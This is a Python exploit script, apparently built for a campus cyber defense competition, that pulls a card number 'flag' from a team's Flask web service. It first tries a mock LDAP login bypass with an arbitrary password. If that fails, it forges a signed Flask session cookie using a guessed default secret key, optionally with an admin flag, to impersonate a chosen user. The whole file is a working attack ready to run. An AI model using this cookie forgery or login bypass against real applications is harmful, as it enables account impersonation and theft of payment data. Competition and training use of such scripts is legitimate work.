import requests
import argparse
from flask.sessions import SecureCookieSessionInterface
from flask import Flask

DEFAULT_SECRET_KEY = "cdc"
DEFAULT_USER = "blue_flag"
TEAM_NUMBER = input("What team number is being targeted: ")
BASE_URL = f"http://mgmt.team{TEAM_NUMBER}.isucdc.com:5000"
#BASE_URL = f"http://localhost:5001"
HEADERS = { "User-Agent": "python-requests/2.67; Francis Bourgeois Fan #73962" }


def forge_flask_cookie(secret_key, user, is_admin=False):
    app = Flask(__name__)
    app.secret_key = secret_key
    payload = {"username": user}
    if is_admin:
        payload["is_admin"] = True
    serializer = SecureCookieSessionInterface().get_signing_serializer(app)
    if serializer is None:
        return None
    return serializer.dumps(payload)

def get_flag(session):
    print("[*] Accessing user's payment info...")
    try:
        response = session.get(f"{BASE_URL}/payment-info/", timeout=5)
        if response.status_code == 200:
            data = response.json()
            return data.get('card_number')
    except Exception as e:
        print(f"[-] Request error: {e}")
    return None

def exploit(user, secret_key, is_admin=False):
    session = requests.Session()
    session.headers.update(HEADERS)

    print(f"[*] Attempting LDAP mock bypass for '{user}'...")
    login_payload = {
        "username": user,
        "password": "any_password"
    }
    try:
        session.post(f"{BASE_URL}/auth/login", json=login_payload, timeout=5)
    except Exception as e:
        print(f"[-] Login request failed: {e}")

    flag = get_flag(session)
    if flag:
        print(f"[+] Success! Blue Flag (Database Flag) retrieved via LDAP bypass: {flag}")
        return

    print("[-] LDAP bypass failed or did not provide access. Falling back to session forgery...")

    session = requests.Session()
    session.headers.update(HEADERS)
    
    cookie = forge_flask_cookie(secret_key, user, is_admin=is_admin)
    if cookie:
        admin_status = " (admin)" if is_admin else ""
        print(f"[*] Forging session cookie for '{user}'{admin_status}...")
        session.cookies.set("session", cookie)
        flag = get_flag(session)
        if flag:
            print(f"[+] Success! Blue Flag (Database Flag) retrieved via session forgery: {flag}")
            return
    else:
        print("[-] Failed to generate forged cookie.")

    print("[-] Both exploit methods failed to retrieve the flag.")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Exploit script for blue_flag data retrieval.")
    parser.add_argument("-u", "--user", default=DEFAULT_USER, help="User to impersonate or login as (default: blue_flag).")
    parser.add_argument("-s", "--secret", default=DEFAULT_SECRET_KEY, help="Secret key for encoding flask sessions (default: cdc).")
    parser.add_argument("--admin", action="store_true", help="Include 'is_admin: True' in the forged session payload.")
    args = parser.parse_args()

    exploit(user=args.user, secret_key=args.secret, is_admin=args.admin)
